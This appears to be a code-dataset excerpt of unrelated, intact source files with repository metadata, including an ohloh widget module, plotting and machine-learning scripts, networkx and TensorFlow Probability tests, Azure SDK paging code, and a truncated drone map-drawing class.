# 02110-1301, USA.
#
import CTK
LANGUAGES_HTML = '<script type="text/javascript" src="http://www.ohloh.net/p/3906/widgets/project_languages.js"></script>'
COCOMO_HTML = '<script type="text/javascript" src="http://www.ohloh.net/p/3906/widgets/project_cocomo.js"></script>'
COCOMO_FIX_JS = """
/* Come on! $55k? Seriously? It must be a typo.. */
$('.ohloh-cocomo-box input:text').filter(function() { return $(this).val() == "55000"; }).each(function() {
$(this).val (90000);
$(this).trigger ('change');
});
"""
class Languages (CTK.Box):
def __init__ (self):
CTK.Box.__init__ (self, {'class': 'ohloh-languages-box'})
self += CTK.RawHTML (LANGUAGES_HTML)
self += CTK.RawHTML (js = COCOMO_FIX_JS)
class Cocomo (CTK.Box):
def __init__ (self):
CTK.Box.__init__ (self, {'class': 'ohloh-cocomo-box'})
self += CTK.RawHTML (COCOMO_HTML)
self += CTK.RawHTML (js = COCOMO_FIX_JS)
|
[
"[email protected]"
] | |
331e2392e43bde4b749c5989c07d18264418908c
|
5a3264c41ded21d24d03bc38063468b45505e0e2
|
/venv/lib/python3.6/keyword.py
|
0538dd34072883fdef176cce0915897d0f4ca804
|
[] |
no_license
|
vjs3/playing-with-flask
|
e4635912550ef5317eac99c507fc43c860ccd4fc
|
d2ef8f80a0501752e4a249543c883877cba35f0d
|
refs/heads/master
| 2020-03-23T10:21:05.605400 | 2018-07-18T12:41:07 | 2018-07-18T12:41:07 | 141,438,422 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 47 |
py
|
/Users/vjs3/miniconda3/lib/python3.6/keyword.py
|
[
"[email protected]"
] | |
f37f65c77fc2cbe630313fe9779572d9243628eb
|
96aa2367affe0dff353e1aaac8713ded087c5f68
|
/utils/spiderPlot_SA.py
|
335ed09082b623795670281ed3731ae77c81e7d3
|
[
"Apache-2.0"
] |
permissive
|
NMTHydro/Recharge
|
0fcca9a72b631d6c3834c62b84dfb096da6cb210
|
bbc1a05add92064acffeffb19f04e370b99a7918
|
refs/heads/develop
| 2020-05-21T17:39:37.702622 | 2020-04-08T17:10:40 | 2020-04-08T17:10:40 | 60,631,952 | 8 | 1 | null | 2016-10-26T17:01:21 | 2016-06-07T17:13:30 |
Python
|
UTF-8
|
Python
| false | false | 5,333 |
py
|
# ===============================================================================
# Copyright 2016 dgketchum
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance
# with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ===============================================================================
# =================================IMPORTS=======================================
import os
import matplotlib.pyplot as plt
from matplotlib import rc
from numpy import linspace, array, add, multiply, set_printoptions
from pandas import read_pickle, set_option, options
def round_to_value(number, roundto):
return round(number / roundto) * roundto
rc('mathtext', default='regular')
set_option('display.max_rows', None)
set_option('display.max_columns', None)
set_option('display.width', None)
set_option('display.precision', 3)
options.display.float_format = '${:,.2f}'.format
set_printoptions(threshold=3000, edgeitems=5000, precision=3)
set_option('display.height', None)
set_option('display.max_rows', None)
TEMPS = range(-5, 6)
ALL_PCT = [x * 0.1 for x in range(5, 16)]
ndvi_range = linspace(0.9, 1.7, 11)
NDVI_RANGE = array([round_to_value(x, 0.05) for x in ndvi_range])
def make_spider_plot(dataframe, ndvi, all_pct, temps, fig_path=None, show=False):
display_pct = [(int(x)) for x in add(multiply(all_pct, 100.0), -100)]
dfs = os.listdir(dataframe)
print 'pickled dfs: {}'.format(dfs)
filename = '_basic_sensitivity_2.pkl'
if filename in dfs:
df = read_pickle(os.path.join(dataframe, filename))
df.to_csv(os.path.join(fig_path, 'sample_df_basic_2.csv'))
pass
print df
xx = 1
for index, row in df.iterrows():
fig = plt.figure(xx, figsize=(20, 10))
ax1 = fig.add_subplot(111)
ax2 = ax1.twiny()
ax3 = ax1.twiny()
fig.subplots_adjust(bottom=0.2)
print 'shape temps: {}, shape row[0]: {}'.format(len(temps), len(row[0]))
ax2.plot(temps, row[0], 'black', label='Temperature (+/- 5 deg C)', marker='8')
ax1.plot(display_pct, row[1], 'blue', label='Precipitation (+/- 50%)', marker='8')
ax1.plot(display_pct, row[2], 'purple', label='Reference Evapotranspiration (+/- 50%)', marker='8')
ax1.plot(display_pct, row[3], 'brown', label='Total Available Water (+/- 50%)', marker='8')
        ax3.plot(ndvi, row[4], 'green', linestyle='-.', label='Normalized Difference Vegetation\n'
                                                              ' Index Conversion Factor (0.9 - 1.7)', marker='8')
ax1.plot(display_pct, row[5], 'red', label='Soil Hydraulic Conductivity (+/- 50%)', marker='8')
ax1.set_xlabel(r"Parameter Change (%)", fontsize=16)
ax1.set_ylabel(r"Total Recharge in 14-Year Simulation (mm)", fontsize=16)
ax2.set_xlabel(r"Temperature Change (C)", fontsize=16)
ax2.xaxis.set_ticks_position("bottom")
ax2.xaxis.set_label_position("bottom")
ax2.spines["bottom"].set_position(("axes", -0.15))
ax2.set_frame_on(True)
ax2.patch.set_visible(False)
for sp in ax2.spines.itervalues():
sp.set_visible(False)
ax2.spines['bottom'].set_visible(True)
ax3.set_xlabel(r"NDVI to Crop Coefficient Conversion Factor", fontsize=16)
ax3.xaxis.set_ticks_position("top")
ax3.xaxis.set_label_position("top")
# ax3.spines["top"].set_position(("axes", 1.0))
ax3.set_frame_on(True)
ax3.patch.set_visible(False)
for sp in ax3.spines.itervalues():
sp.set_visible(False)
ax3.spines['top'].set_visible(True)
        plt.title('Variation of ETRM Physical Parameters at {}'.format(str(index).replace('_', ' ')),
y=1.08, fontsize=20)
handle1, label1 = ax1.get_legend_handles_labels()
handle2, label2 = ax2.get_legend_handles_labels()
handle3, label3 = ax3.get_legend_handles_labels()
handles, labels = handle1 + handle2 + handle3, label1 + label2 + label3
ax1.legend(handles, labels, loc=0)
if show:
plt.show()
# if fig_path:
# plt.savefig(os.path.join(fig_path, '{}_spider'.format(index)), dpi=600, ext='jpg', close=True,
# verbose=True)
plt.close(fig)
if __name__ == '__main__':
root = os.path.join('F:\\', 'ETRM_Inputs')
sensitivity = os.path.join(root, 'sensitivity_analysis')
pickles = os.path.join(sensitivity, 'pickled')
figure_save_path = os.path.join(sensitivity, 'figures')
make_spider_plot(pickles, NDVI_RANGE, ALL_PCT, TEMPS, figure_save_path, show=True)
# ========================== EOF ==============================================
|
[
"[email protected]"
] | |
677993bbfd1033c8a7be8606b387754616bdceda
|
853d4cec42071b76a80be38c58ffe0fbf9b9dc34
|
/venv/Lib/site-packages/networkx/algorithms/isomorphism/tests/test_tree_isomorphism.py
|
3082365a4bb61f2d8c99fcddb56c72e2af1d0aeb
|
[] |
no_license
|
msainTesting/TwitterAnalysis
|
5e1646dbf40badf887a86e125ef30a9edaa622a4
|
b1204346508ba3e3922a52380ead5a8f7079726b
|
refs/heads/main
| 2023-08-28T08:29:28.924620 | 2021-11-04T12:36:30 | 2021-11-04T12:36:30 | 424,242,582 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 7,443 |
py
|
import networkx as nx
import random
import time
from networkx.classes.function import is_directed
from networkx.algorithms.isomorphism.tree_isomorphism import (
rooted_tree_isomorphism,
tree_isomorphism,
)
# have this work for graph
# given two trees (either the directed or undirected)
# transform t2 according to the isomorphism
# and confirm it is identical to t1
# randomize the order of the edges when constructing
def check_isomorphism(t1, t2, isomorphism):
# get the name of t1, given the name in t2
mapping = {v2: v1 for (v1, v2) in isomorphism}
# these should be the same
d1 = is_directed(t1)
d2 = is_directed(t2)
assert d1 == d2
edges_1 = []
for (u, v) in t1.edges():
if d1:
edges_1.append((u, v))
else:
# if not directed, then need to
# put the edge in a consistent direction
if u < v:
edges_1.append((u, v))
else:
edges_1.append((v, u))
edges_2 = []
for (u, v) in t2.edges():
# translate to names for t1
u = mapping[u]
v = mapping[v]
if d2:
edges_2.append((u, v))
else:
if u < v:
edges_2.append((u, v))
else:
edges_2.append((v, u))
return sorted(edges_1) == sorted(edges_2)
def test_hardcoded():
print("hardcoded test")
# define a test problem
edges_1 = [
("a", "b"),
("a", "c"),
("a", "d"),
("b", "e"),
("b", "f"),
("e", "j"),
("e", "k"),
("c", "g"),
("c", "h"),
("g", "m"),
("d", "i"),
("f", "l"),
]
edges_2 = [
("v", "y"),
("v", "z"),
("u", "x"),
("q", "u"),
("q", "v"),
("p", "t"),
("n", "p"),
("n", "q"),
("n", "o"),
("o", "r"),
("o", "s"),
("s", "w"),
]
# there are two possible correct isomorphisms
# it currently returns isomorphism1
# but the second is also correct
isomorphism1 = [
("a", "n"),
("b", "q"),
("c", "o"),
("d", "p"),
("e", "v"),
("f", "u"),
("g", "s"),
("h", "r"),
("i", "t"),
("j", "y"),
("k", "z"),
("l", "x"),
("m", "w"),
]
# could swap y and z
isomorphism2 = [
("a", "n"),
("b", "q"),
("c", "o"),
("d", "p"),
("e", "v"),
("f", "u"),
("g", "s"),
("h", "r"),
("i", "t"),
("j", "z"),
("k", "y"),
("l", "x"),
("m", "w"),
]
t1 = nx.Graph()
t1.add_edges_from(edges_1)
root1 = "a"
t2 = nx.Graph()
t2.add_edges_from(edges_2)
root2 = "n"
isomorphism = sorted(rooted_tree_isomorphism(t1, root1, t2, root2))
# is correct by hand
assert (isomorphism == isomorphism1) or (isomorphism == isomorphism2)
# check algorithmically
assert check_isomorphism(t1, t2, isomorphism)
# try again as digraph
t1 = nx.DiGraph()
t1.add_edges_from(edges_1)
root1 = "a"
t2 = nx.DiGraph()
t2.add_edges_from(edges_2)
root2 = "n"
isomorphism = sorted(rooted_tree_isomorphism(t1, root1, t2, root2))
# is correct by hand
assert (isomorphism == isomorphism1) or (isomorphism == isomorphism2)
# check algorithmically
assert check_isomorphism(t1, t2, isomorphism)
# randomly swap a tuple (a,b)
def random_swap(t):
(a, b) = t
if random.randint(0, 1) == 1:
return (a, b)
else:
return (b, a)
# given a tree t1, create a new tree t2
# that is isomorphic to t1, with a known isomorphism
# and test that our algorithm found the right one
def positive_single_tree(t1):
assert nx.is_tree(t1)
nodes1 = [n for n in t1.nodes()]
# get a random permutation of this
nodes2 = nodes1.copy()
random.shuffle(nodes2)
# this is one isomorphism, however they may be multiple
# so we don't necessarily get this one back
someisomorphism = [(u, v) for (u, v) in zip(nodes1, nodes2)]
# map from old to new
map1to2 = {u: v for (u, v) in someisomorphism}
# get the edges with the transformed names
edges2 = [random_swap((map1to2[u], map1to2[v])) for (u, v) in t1.edges()]
# randomly permute, to ensure we're not relying on edge order somehow
random.shuffle(edges2)
# so t2 is isomorphic to t1
t2 = nx.Graph()
t2.add_edges_from(edges2)
# lets call our code to see if t1 and t2 are isomorphic
isomorphism = tree_isomorphism(t1, t2)
# make sure we got a correct solution
# although not necessarily someisomorphism
assert len(isomorphism) > 0
assert check_isomorphism(t1, t2, isomorphism)
# run positive_single_tree over all the
# non-isomorphic trees for k from 4 to maxk
# k = 4 is the first level that has more than 1 non-isomorphic tree
# k = 13 takes about 2.86 seconds to run on my laptop
# larger values run slow down significantly
# as the number of trees grows rapidly
def test_positive(maxk=14):
print("positive test")
for k in range(2, maxk + 1):
start_time = time.time()
trial = 0
for t in nx.nonisomorphic_trees(k):
positive_single_tree(t)
trial += 1
print(k, trial, time.time() - start_time)
# test the trivial case of a single node in each tree
# note that nonisomorphic_trees doesn't work for k = 1
def test_trivial():
print("trivial test")
# back to an undirected graph
t1 = nx.Graph()
t1.add_node("a")
root1 = "a"
t2 = nx.Graph()
t2.add_node("n")
root2 = "n"
isomorphism = rooted_tree_isomorphism(t1, root1, t2, root2)
assert isomorphism == [("a", "n")]
assert check_isomorphism(t1, t2, isomorphism)
# test another trivial case where the two graphs have
# different numbers of nodes
def test_trivial_2():
print("trivial test 2")
edges_1 = [("a", "b"), ("a", "c")]
edges_2 = [("v", "y")]
t1 = nx.Graph()
t1.add_edges_from(edges_1)
t2 = nx.Graph()
t2.add_edges_from(edges_2)
isomorphism = tree_isomorphism(t1, t2)
# they cannot be isomorphic,
# since they have different numbers of nodes
assert isomorphism == []
# the function nonisomorphic_trees generates all the non-isomorphic
# trees of a given size. Take each pair of these and verify that
# they are not isomorphic
# k = 4 is the first level that has more than 1 non-isomorphic tree
# k = 11 takes about 4.76 seconds to run on my laptop
# larger values run slow down significantly
# as the number of trees grows rapidly
def test_negative(maxk=11):
print("negative test")
for k in range(4, maxk + 1):
test_trees = list(nx.nonisomorphic_trees(k))
start_time = time.time()
trial = 0
for i in range(len(test_trees) - 1):
for j in range(i + 1, len(test_trees)):
trial += 1
assert tree_isomorphism(test_trees[i], test_trees[j]) == []
print(k, trial, time.time() - start_time)
|
[
"[email protected]"
] | |
42d0987e6e1898a0e5f60a297e7db42a013fab6d
|
bcf332d2f6ef6970cfaa480400a112ecee3f16b8
|
/stage07-artist2/s1level42.py
|
c5f34c2ae0814db387a0d43027c8ee7cd714f9b1
|
[
"Unlicense"
] |
permissive
|
skilstak/code-dot-org-python
|
e1907d29f3727060e5064a5eefd68a0f9f4f5c70
|
ba127124386ecfdc20bd84592b3c271f8205d748
|
refs/heads/master
| 2020-04-04T19:34:23.531210 | 2015-07-10T12:39:19 | 2015-07-10T12:39:19 | 26,862,410 | 7 | 4 | null | 2014-11-21T20:28:20 | 2014-11-19T13:24:30 |
Python
|
UTF-8
|
Python
| false | false | 465 |
py
|
"""Stage 7: Puzzle 8 of 11
Here's the solution to the previous puzzle. Can you add just 2 more
lines of code to complete the drawing?
"""
import sys
sys.path.append('..')
import codestudio
artist = codestudio.load('s1level42')
artist.speed = 'faster'
a = artist
for count2 in range(10):
artist.color = artist.random_color()
for count in range(4):
artist.move_forward(20)
artist.turn_right(90)
artist.move_forward(20)
artist.check()
|
[
"[email protected]"
] | |
a3c03bb30d7ab9d2444696500ece8c13bfd13edd
|
2fabea234735beefc980b77b213fcb0dfb394980
|
/tensorflow_probability/python/math/sparse_test.py
|
aca018215524f5574b3df657c781c4d51d85533d
|
[
"Apache-2.0"
] |
permissive
|
tarrou/probability
|
0eee452b525a6e6b3c7c98d467468e47f07e861b
|
d4d80a1c04ad0b3e98758ebc3f7f82887274384d
|
refs/heads/master
| 2020-08-08T11:16:42.441268 | 2019-12-06T17:35:17 | 2019-12-06T17:35:17 | 213,819,828 | 0 | 0 |
Apache-2.0
| 2019-10-09T04:20:19 | 2019-10-09T04:20:19 | null |
UTF-8
|
Python
| false | false | 6,549 |
py
|
# Copyright 2018 The TensorFlow Probability Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""Tests for sparse ops."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
# Dependency imports
import numpy as np
import tensorflow.compat.v1 as tf1
import tensorflow.compat.v2 as tf
import tensorflow_probability as tfp
from tensorflow_probability.python.internal import test_case
from tensorflow.python.framework import test_util # pylint: disable=g-direct-tensorflow-import
def _assert_sparse_tensor_value(test_case_instance, expected, actual):
test_case_instance.assertEqual(np.int64, np.array(actual.indices).dtype)
test_case_instance.assertAllEqual(expected.indices, actual.indices)
test_case_instance.assertEqual(
np.array(expected.values).dtype, np.array(actual.values).dtype)
test_case_instance.assertAllEqual(expected.values, actual.values)
test_case_instance.assertEqual(np.int64, np.array(actual.dense_shape).dtype)
test_case_instance.assertAllEqual(expected.dense_shape, actual.dense_shape)
@test_util.run_all_in_graph_and_eager_modes
class SparseTest(test_case.TestCase):
# Copied (with modifications) from:
# tensorflow/contrib/layers/python/ops/sparse_ops.py.
def test_dense_to_sparse_1d(self):
st = tfp.math.dense_to_sparse([1, 0, 2, 0])
result = self.evaluate(st)
self.assertEqual(result.indices.dtype, np.int64)
self.assertEqual(result.values.dtype, np.int32)
self.assertEqual(result.dense_shape.dtype, np.int64)
self.assertAllEqual([[0], [2]], result.indices)
self.assertAllEqual([1, 2], result.values)
self.assertAllEqual([4], result.dense_shape)
def test_dense_to_sparse_1d_float(self):
st = tfp.math.dense_to_sparse([1.5, 0.0, 2.3, 0.0])
result = self.evaluate(st)
self.assertEqual(result.indices.dtype, np.int64)
self.assertEqual(result.values.dtype, np.float32)
self.assertEqual(result.dense_shape.dtype, np.int64)
self.assertAllEqual([[0], [2]], result.indices)
self.assertAllClose([1.5, 2.3], result.values)
self.assertAllEqual([4], result.dense_shape)
def test_dense_to_sparse_1d_bool(self):
st = tfp.math.dense_to_sparse([True, False, True, False])
result = self.evaluate(st)
self.assertEqual(result.indices.dtype, np.int64)
self.assertEqual(result.values.dtype, np.bool)
self.assertEqual(result.dense_shape.dtype, np.int64)
self.assertAllEqual([[0], [2]], result.indices)
self.assertAllEqual([True, True], result.values)
self.assertAllEqual([4], result.dense_shape)
def test_dense_to_sparse_1d_str(self):
st = tfp.math.dense_to_sparse([b'qwe', b'', b'ewq', b''])
result = self.evaluate(st)
self.assertEqual(result.indices.dtype, np.int64)
self.assertEqual(result.values.dtype, np.object)
self.assertEqual(result.dense_shape.dtype, np.int64)
self.assertAllEqual([[0], [2]], result.indices)
self.assertAllEqual([b'qwe', b'ewq'], result.values)
self.assertAllEqual([4], result.dense_shape)
def test_dense_to_sparse_1d_str_special_ignore(self):
st = tfp.math.dense_to_sparse(
[b'qwe', b'', b'ewq', b''], ignore_value=b'qwe')
result = self.evaluate(st)
self.assertEqual(result.indices.dtype, np.int64)
self.assertEqual(result.values.dtype, np.object)
self.assertEqual(result.dense_shape.dtype, np.int64)
self.assertAllEqual([[1], [2], [3]], result.indices)
self.assertAllEqual([b'', b'ewq', b''], result.values)
self.assertAllEqual([4], result.dense_shape)
def test_dense_to_sparse_2d(self):
st = tfp.math.dense_to_sparse([[1, 2, 0, 0], [3, 4, 5, 0]])
result = self.evaluate(st)
self.assertAllEqual([[0, 0], [0, 1], [1, 0], [1, 1], [1, 2]],
result.indices)
self.assertAllEqual([1, 2, 3, 4, 5], result.values)
self.assertAllEqual([2, 4], result.dense_shape)
def test_dense_to_sparse_3d(self):
st = tfp.math.dense_to_sparse(
[[[1, 2, 0, 0],
[3, 4, 5, 0]],
[[7, 8, 0, 0],
[9, 0, 0, 0]]])
result = self.evaluate(st)
self.assertAllEqual(
[[0, 0, 0],
[0, 0, 1],
[0, 1, 0],
[0, 1, 1],
[0, 1, 2],
[1, 0, 0],
[1, 0, 1],
[1, 1, 0]],
result.indices)
self.assertAllEqual([1, 2, 3, 4, 5, 7, 8, 9], result.values)
self.assertAllEqual([2, 2, 4], result.dense_shape)
def test_dense_to_sparse_unknown_1d_shape(self):
tensor = tf1.placeholder_with_default(
np.array([0, 100, 0, 3], np.int32), shape=[None])
st = tfp.math.dense_to_sparse(tensor)
result = self.evaluate(st)
self.assertAllEqual([[1], [3]], result.indices)
self.assertAllEqual([100, 3], result.values)
self.assertAllEqual([4], result.dense_shape)
def test_dense_to_sparse_unknown_3d_shape(self):
tensor = tf1.placeholder_with_default(
np.array([[[1, 2, 0, 0], [3, 4, 5, 0]], [[7, 8, 0, 0], [9, 0, 0, 0]]],
np.int32),
shape=[None, None, None])
st = tfp.math.dense_to_sparse(tensor)
result = self.evaluate(st)
self.assertAllEqual(
[[0, 0, 0],
[0, 0, 1],
[0, 1, 0],
[0, 1, 1],
[0, 1, 2],
[1, 0, 0],
[1, 0, 1],
[1, 1, 0]],
result.indices)
self.assertAllEqual([1, 2, 3, 4, 5, 7, 8, 9], result.values)
self.assertAllEqual([2, 2, 4], result.dense_shape)
def test_dense_to_sparse_unknown_rank(self):
ph = tf1.placeholder_with_default(
np.array([[1, 2, 0, 0], [3, 4, 5, 0]], np.int32), shape=None)
st = tfp.math.dense_to_sparse(ph)
result = self.evaluate(st)
self.assertAllEqual(
[[0, 0],
[0, 1],
[1, 0],
[1, 1],
[1, 2]],
result.indices)
self.assertAllEqual([1, 2, 3, 4, 5], result.values)
self.assertAllEqual([2, 4], result.dense_shape)
if __name__ == '__main__':
tf.test.main()
|
[
"[email protected]"
] | |
d9fd3e3f6f7c3d6c386072c39ae5b4202edd2d08
|
2f3c4ea9f0a9ab60a38fa8afc9087b327da643be
|
/Cross-Validation/validacao_cruzada_cross_val_score.py
|
5c5d20ef1eee0fe967bf20593a4b9ef4a4db4711
|
[] |
no_license
|
guilhermelamb/Machine-Learning-Studies
|
e919c74f4b881c049b87b46191e65f3f77235d13
|
1abff5a0a063636468b00c68015f1a8c8b058757
|
refs/heads/main
| 2023-08-19T07:55:01.538452 | 2021-10-12T15:13:05 | 2021-10-12T15:13:05 | 333,989,001 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 787 |
py
|
import pandas as pd
import numpy as np
from sklearn.preprocessing import StandardScaler
from sklearn.impute import SimpleImputer
from sklearn.model_selection import cross_val_score
from sklearn.naive_bayes import GaussianNB
base = pd.read_csv('credit_data.csv')
base.loc[base.age < 0, 'age'] = 40.92
previsores = base.iloc[:, 1:4].values
classe = base.iloc[:,4].values
imputer = SimpleImputer(missing_values = np.nan, strategy='mean')
imputer = imputer.fit(previsores[:,1:4])
previsores[:,1:4] = imputer.transform(previsores[:,1:4])
scaler = StandardScaler()
previsores = scaler.fit_transform(previsores)
classificador = GaussianNB()
resultados = cross_val_score(classificador, previsores, classe, cv = 10)
resultado_final = resultados.mean()
resultado_std = resultados.std()
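# Illustrative addition (not part of the original script): report the cross-validated
# accuracy and its spread across the 10 folds
print('Accuracy over 10 folds: %.4f (std %.4f)' % (resultado_final, resultado_std))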
|
[
"[email protected]"
] | |
1b5849466318aa075976375e01fa22fddd690edc
|
531c47c15b97cbcb263ec86821d7f258c81c0aaf
|
/sdk/network/azure-mgmt-network/azure/mgmt/network/v2019_08_01/operations/_network_interface_load_balancers_operations.py
|
e42bd6eccf89e6b11dbf117b8ae8f3bcc1bcf2ca
|
[
"LicenseRef-scancode-generic-cla",
"LGPL-2.1-or-later",
"MIT"
] |
permissive
|
YijunXieMS/azure-sdk-for-python
|
be364d3b88204fd3c7d223df23756386ff7a3361
|
f779de8e53dbec033f98f976284e6d9491fd60b3
|
refs/heads/master
| 2021-07-15T18:06:28.748507 | 2020-09-04T15:48:52 | 2020-09-04T15:48:52 | 205,457,088 | 1 | 2 |
MIT
| 2020-06-16T16:38:15 | 2019-08-30T21:08:55 |
Python
|
UTF-8
|
Python
| false | false | 5,600 |
py
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import TYPE_CHECKING
import warnings
from azure.core.exceptions import HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.paging import ItemPaged
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import HttpRequest, HttpResponse
from azure.mgmt.core.exceptions import ARMErrorFormat
from .. import models
if TYPE_CHECKING:
# pylint: disable=unused-import,ungrouped-imports
from typing import Any, Callable, Dict, Generic, Iterable, Optional, TypeVar
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, HttpResponse], T, Dict[str, Any]], Any]]
class NetworkInterfaceLoadBalancersOperations(object):
"""NetworkInterfaceLoadBalancersOperations operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:ivar models: Alias to model classes used in this operation group.
:type models: ~azure.mgmt.network.v2019_08_01.models
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = models
def __init__(self, client, config, serializer, deserializer):
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self._config = config
def list(
self,
resource_group_name, # type: str
network_interface_name, # type: str
**kwargs # type: Any
):
# type: (...) -> Iterable["models.NetworkInterfaceLoadBalancerListResult"]
"""List all load balancers in a network interface.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param network_interface_name: The name of the network interface.
:type network_interface_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either NetworkInterfaceLoadBalancerListResult or the result of cls(response)
:rtype: ~azure.core.paging.ItemPaged[~azure.mgmt.network.v2019_08_01.models.NetworkInterfaceLoadBalancerListResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["models.NetworkInterfaceLoadBalancerListResult"]
error_map = {404: ResourceNotFoundError, 409: ResourceExistsError}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2019-08-01"
def prepare_request(next_link=None):
if not next_link:
# Construct URL
url = self.list.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'networkInterfaceName': self._serialize.url("network_interface_name", network_interface_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = 'application/json'
# Construct and send request
request = self._client.get(url, query_parameters, header_parameters)
return request
def extract_data(pipeline_response):
deserialized = self._deserialize('NetworkInterfaceLoadBalancerListResult', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, iter(list_of_elem)
def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
return pipeline_response
return ItemPaged(
get_next, extract_data
)
list.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/networkInterfaces/{networkInterfaceName}/loadBalancers'} # type: ignore
|
[
"[email protected]"
] | |
950b22a78a928e4427896cec1ba0d7c4cac4e011
|
6a4bfff7fcd78a0057401652c7f80d9a95a67267
|
/painless_redirects/tests/test_models.py
|
2f5b98013047caa595a23ef12657abfbbafe3877
|
[
"MIT"
] |
permissive
|
benzkji/django-painless-redirects
|
25987ff984830be7e45b4d0af9a9cd0046beabe7
|
153721486b214ddd5365b6ac5769129562254dd5
|
refs/heads/master
| 2023-05-24T14:23:53.783400 | 2020-06-22T10:35:29 | 2020-06-22T10:35:29 | 22,944,463 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 558 |
py
|
"""Tests for the models of the painless_redirects app."""
from django.test import TestCase
from . import factories
class RedirectModelTestCase(TestCase):
def test_model(self):
obj = factories.RedirectFactory()
self.assertTrue(obj.pk)
def test_redirect_value(self):
obj = factories.RedirectFactory()
self.assertEqual(obj.redirect_value('http'), "/the-new-path/")
obj.new_site = factories.SiteFactory()
self.assertEqual(obj.redirect_value('https'), "https://%s/the-new-path/" % obj.new_site.domain)
|
[
"[email protected]"
] | |
b5dd9c0170e9576edc3884cda967bd39951aad8f
|
13fa6b903547618d567c3284b9dc637024800947
|
/Código-fonte/navigation/SLAM/map_view.py
|
0d40fc571f4a21cc1956f3e290760dd3e68519b6
|
[] |
no_license
|
EvoSystems-com-br/IniciacaoCientifica2018_ProjetoDrones
|
cc5a8a91dbc007cad85000a31465ed3950980bd1
|
8af0ca6930b326ae7bc0cd7bb9aa2d6aa62bceeb
|
refs/heads/master
| 2020-03-26T11:49:31.933492 | 2018-10-30T19:41:16 | 2018-10-30T19:41:16 | 144,861,611 | 0 | 3 | null | 2018-10-30T19:41:19 | 2018-08-15T14:11:58 |
Python
|
UTF-8
|
Python
| false | false | 2,335 |
py
|
import cv2
import time
import math
import numpy as np
PIXEL_RATE = 1.75
OFFSET_X = 60
OFFSET_Y = 50
RANGE_Y = 150
CIRCLE_RADIO = 15
MARKER_SIZE = 20
class MapView():
def __init__(self):
self.esquema = cv2.imread("data/esquema.png")
self.esquema = cv2.resize(self.esquema, (480, 360))
self.drone = cv2.imread("data/drone.png")
self.drone = cv2.resize(self.drone, (48, 36))
self.updateMap([[50], [0],[180]])
def updateMap(self, X):
self.map = self.esquema.copy()
self.drawDrone(X[0][0], X[1][0], X[2][0])
n_marker = int((len(X)/3) - 1)
for i in range(n_marker):
x1 = X[3+3*i][0]
y1 = X[4+3*i][0]
beta = X[5+3*i][0] *3.14/180
x2 = x1 - MARKER_SIZE*math.sin(beta)
y2 = y1 + MARKER_SIZE*math.cos(beta)
            # convert coordinates in cm to pixel coordinates
coord_x1 = int(OFFSET_X + x1*PIXEL_RATE)
coord_y1 = int(OFFSET_Y + (RANGE_Y-y1)*PIXEL_RATE)
coord_x2 = int(OFFSET_X + x2*PIXEL_RATE)
coord_y2 = int(OFFSET_Y + (RANGE_Y-y2)*PIXEL_RATE)
self.map = cv2.line(self.map, (coord_x1, coord_y1),
(coord_x2, coord_y2), (19, 69,139), 5)
def drawDrone(self, x, y, alpha):
        # convert coordinates in cm to pixel coordinates
coord_x = int(OFFSET_X + x*PIXEL_RATE)
coord_y = int(OFFSET_Y + (RANGE_Y-y)*PIXEL_RATE)
cv2.circle(self.map, (coord_x, coord_y), CIRCLE_RADIO, (255, 0, 0), -1)
        # draw the drone's orientation
p1_x = coord_x + CIRCLE_RADIO*math.cos((alpha+30)*3.14/180)
